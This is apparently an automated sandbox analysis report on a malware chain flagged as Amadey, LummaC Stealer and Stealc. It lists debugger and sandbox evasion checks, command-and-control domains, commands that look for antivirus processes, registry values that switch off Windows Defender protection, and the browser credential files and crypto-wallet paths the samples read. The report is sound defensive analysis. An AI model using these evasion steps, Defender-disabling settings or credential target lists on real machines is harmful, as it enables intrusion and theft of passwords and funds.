driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: SIWVID
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BD31C7 rdtsc 2_2_00BD31C7
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00A5B7D2 LdrInitializeThunk, 2_2_00A5B7D2
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F1652B mov eax, dword ptr fs:[00000030h] 7_2_00F1652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F1A302 mov eax, dword ptr fs:[00000030h] 7_2_00F1A302
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1654441661.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe "C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" /VERYSILENT Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: Updater.exe, 0000002E.00000000.2495953945.0000000000DC1000.00000002.00000001.01000000.00000018.sdmp, random[1].exe1.7.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: FT773VWATWFL9SRK5RTU4.exe, 00000002.00000002.1981588647.0000000000C1C000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000007.00000002.4110473002.00000000010C5000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: &Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00EFD3E2 cpuid 7_2_00EFD3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003147001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003147001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Queries volume information: C:\Users\user\AppData\Local\hangbird\Updater.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BD3511 GetSystemTime,CreateFileA, 2_2_00BD3511
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00EE65E0 LookupAccountNameA, 7_2_00EE65E0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.1833739536.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749526956.0000000000816000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2725396199.000000000177E000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2720333364.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2853047453.0000000001775000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2778758863.0000000001780000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2775810352.0000000001780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: find.exe, 0000001E.00000002.2480184827.0000022A4B32B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001E.00000002.2480598012.0000022A4B470000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000003A.00000002.2525608616.000001643AE80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 7.2.skotes.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.KOLH45MMED0OMDDRYHIG.exe.390000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1900844822.0000000000391000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1876760920.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1917446000.0000000000EE1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4110113198.0000000000EE1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1860646756.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2333467798.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9eba8044e7.exe PID: 5448, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003147001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.1682378325.00000000007F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: file.exe, 00000000.00000003.1785012541.0000000000798000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000003.1785012541.0000000000798000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1682138495.00000000007F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus",
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.1682087443.00000000007EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/EthereumBgzuEY&[
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.1682378325.00000000007F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
